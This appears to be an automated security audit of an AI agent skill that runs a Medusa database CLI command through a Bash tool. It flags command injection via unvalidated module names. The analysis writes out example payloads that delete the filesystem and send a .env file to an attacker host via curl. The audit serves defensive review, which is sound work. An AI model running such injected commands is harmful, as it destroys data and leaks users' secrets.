db-generate
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- PROMPT_INJECTION (HIGH): The skill allows for direct command injection by instructing the agent to place unvalidated user input (
<module-name>) into a shell command template (npx medusa db:generate <module-name>). An attacker could provide a payload such asmodule; rm -rf /ormodule; curl http://attacker.com/$(cat .env)to execute arbitrary code or exfiltrate secrets.- COMMAND_EXECUTION (HIGH): The skill uses theBashtool to run commands constructed at runtime using external data. This pattern is inherently dangerous without strict input filtering or the use of safe execution APIs that avoid shell interpolation.- EXTERNAL_DOWNLOADS (LOW): The skill relies onnpxto execute the Medusa CLI. This may trigger downloads from the public npm registry. While Medusa is a reputable framework, the lack of version pinning or integrity checks for the environment is a minor risk factor.
Recommendations
- AI detected serious security threats
Audit Metadata